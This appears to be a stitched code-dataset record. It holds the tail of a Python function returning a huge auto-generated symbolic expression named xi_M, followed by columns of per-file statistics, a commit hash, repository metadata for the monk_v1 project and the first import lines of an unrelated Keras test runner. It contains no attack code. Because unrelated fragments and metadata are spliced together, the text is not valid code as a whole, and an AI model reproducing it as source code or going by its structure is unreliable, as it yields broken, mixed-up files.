[x_norm**(-61.0)*(dz0*(dz0*z0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dx0*x0 + dy0*y0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + 
w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 
dz0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 
13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dx0*(dy0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - 
w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dy0*(dx0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dy0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - 
exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dx0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dz0*sigma_alpha**2*sigma_gamma**2*x0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dy0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - 
exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dz0*sigma_alpha**2*sigma_gamma**2*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + 
w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)]
])
return xi_M
| 1,246.333333
| 18,843
| 0.615271
| 14,806
| 59,824
| 2.287383
| 0.00412
| 0.19739
| 0.218266
| 0.108513
| 0.994892
| 0.994567
| 0.994567
| 0.994567
| 0.994301
| 0.994301
| 0
| 0.132077
| 0.054978
| 59,824
| 47
| 18,844
| 1,272.851064
| 0.466967
| 0.002925
| 0
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.074074
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fa7b41626dc1421fbea2b0da9de7263b6815914a
| 30,399
|
py
|
Python
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 542
|
2019-11-10T12:09:31.000Z
|
2022-03-28T11:39:07.000Z
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 117
|
2019-11-12T09:39:24.000Z
|
2022-03-12T00:20:41.000Z
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 246
|
2019-11-09T21:53:24.000Z
|
2022-03-29T00:57:07.000Z
|
import os
import sys
import time
from test_optimizer_sgd import test_optimizer_sgd
from test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
